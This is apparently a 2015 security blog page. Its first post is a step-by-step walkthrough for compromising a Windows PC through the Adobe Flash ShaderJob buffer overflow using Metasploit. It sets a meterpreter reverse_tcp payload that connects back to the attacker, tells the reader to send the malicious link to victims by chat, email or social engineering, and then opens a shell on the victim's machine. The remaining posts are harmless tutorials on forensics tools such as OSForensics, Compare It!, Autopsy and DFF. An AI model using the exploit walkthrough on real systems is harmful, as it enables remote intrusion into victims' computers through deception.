Hack Remote Windows PC using Adobe Flash Player ShaderJob Buffer Overflow

at 12:52 AM Saturday, July 4, 2015 0 comments
This module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.

Exploit Targets
Windows 7
Firefox 38.0.5
Adobe Flash 17.0.0.169

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/windows/browser/adobe_flash_shader_job_overflow
msf exploit (adobe_flash_shader_job_overflow)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_shader_job_overflow)>set lhost 192.168.0.160 (IP of Local Host)
msf exploit (adobe_flash_shader_job_overflow)>set srvhost 192.168.0.160
msf exploit (adobe_flash_shader_job_overflow)>set uripath /
msf exploit (adobe_flash_shader_job_overflow)>exploit


Now an URL you should give to your victim http://192.168.0.160:8080


Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.0.160:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

Labels: ,

Forensics Investigation of Deleted Files in a Drive

at 11:15 PM Friday, June 26, 2015 0 comments
First of all download the OSForensics from here.


Select Create Signature Option. Click on Config .


Now browse the desired Directory from Directory list management, in my case I am selecting Desktop.

 Click on Add to list Option to include the directory. Click OK.


Now in start folder option, it will show us the selected Drive i.e. c:\users\raj\desktop. Click on the Start Option.


 It will ask for the File Name, enter the File Name & click on Save. So signature for data drive will be created.



Now does some modification in data drive and repeat the same steps to create another signature after modifications in data drive.


Now click on Compare Signature Option.


Browse both files i.e. Old Signature as well as New Signature Option.


Click on Compare option .It will start the process. Now it will show us the files with their modification status as well as their creation and modification date. We can select show option to see only modified or deleted files.


Now it will show only deleted or modified files with their creation and deletion date.


Labels:

Comparison of two Files for forensics investigation by Compare IT

at 12:36 AM Wednesday, June 17, 2015 0 comments
Compare It! displays 2 files side by side, with colored differences sections to simplify analyzing.  You can move changes between files with single mouse click or keystroke, and of course you have ability to edit files directly in comparison window. It can make colored printout of differences report, exactly as it's on the screen. It supports regular expressions, so you could easily strip XML tags from file to compare XML with XML or XML with text!? While running on all MS Windows variants, Compare It! can compare merge save text files from DOS, Windows, UNIX, Mac systems. It can create HTML report of your results.
Compare It! supports auto-backup folder with old file versions, so you could always revert your file after inaccurate merging.

First of all install the Compare It from the Link given below.

http://www.grigsoft.com/wincmp3.htm

Click on Compare It Tool, It will show a window to select the files to be compared.

First select the first file and click on open and then select the second file and click on open


Now it will show us the changes in highlighted bar.


Now click on View and select Next Change and it will show the next change.


Now click on view and select Changes only. It will show all the changes simultaneously.


Now click on Merge and Select Separate Option.It will separate the changed lines.


Now select Edit checkbox in status bar. The cursor will move to the changed line and now the text can be edited.

Labels:

Live Case Investigation using Autopsy

at 6:11 AM Monday, June 8, 2015 0 comments
First Download autopsy from here and install in your pc.

Click ‘Create a New Case’ option.


A new page will open. Enter the details in ‘Case Name’ and ‘Base Directory’ and choose the location to save the report e.g. :c\users\raj\desktop\auto. Then click on next to proceed to next step. 


Here in next step you have to enter the case number and Examiner details and click on finish to proceed to next step


 A new window will open .It will ask for add data source in Step 1. Select source type to add & browse the file Path and click on NEXT Option to proceed further.


In Step 2.  Configure ingest Modules I have chosen all the modules as I am looking for complete information on evidence device or disk or system  etc. and click next to proceed further.


In Add Data Source just click on finish to generate the report of the device and you can perform complete investigate on the victim device or system or any other disk. It will process the data Source and add it to local database.


After Process completion, it will show Forensic Investigation Report. Now click on Devices Attached option, it will show the list of attached device with system.


Now click on EXIF Metadata (Exchangeable image file format for images, sound used by Digital Camera, Smartphone and scanner).It will show the image files.


Now click on Installed Programs to see the entire installed programs in the system.


Click Operating System Information. It will show the entire operating system list.


Now Select Operating System User Account Optiion . It will Display  the name of all the user Accounts.


Now click on Recent Documents Option, it will display latest created or opened documents.


Click Web Bookmarks Option to see all the bookmarks by system users in different browsers.


To see web cookies, select web cookies option.


To See Web Downloads, Click on Web Downloads option.


To check internet History, click on Web History Option.


To see the history of internet search, click on Web Search Option.


To see the list of all email ids in the system, click on email address.

Labels:

How to Install Digital Forensics Framework in System

at 3:15 AM Saturday, June 6, 2015 0 comments
DFF (Digital Forensics Framework) is a free and Open Source computer forensics software built on top of a dedicated Application Programming Interface (API).

It can be used both by professional and non-expert people in order to quickly and easily collect, preserve and reveal digital evidences without compromising systems and data.

To install DFF (Digital Forensics Framework), firstly install python from link given below

Python from Here.


Install PyQt4 from Here  . These both are prerequisite for DFF.


Now click on I Agree Option


Select the type of install & click on Next.


Choose Python Installation Folder & click on Install.


Now Install DFF from Here & click on Next.


Click on I Agree to proceed Further.


Now Choose Destination Folder to Install DFF 7 clicks on Next.


Now Choose Start Menu Folder & Click on Install.


Click on Finish to complete the installation.


Labels:
Subscribe to: Posts (Atom)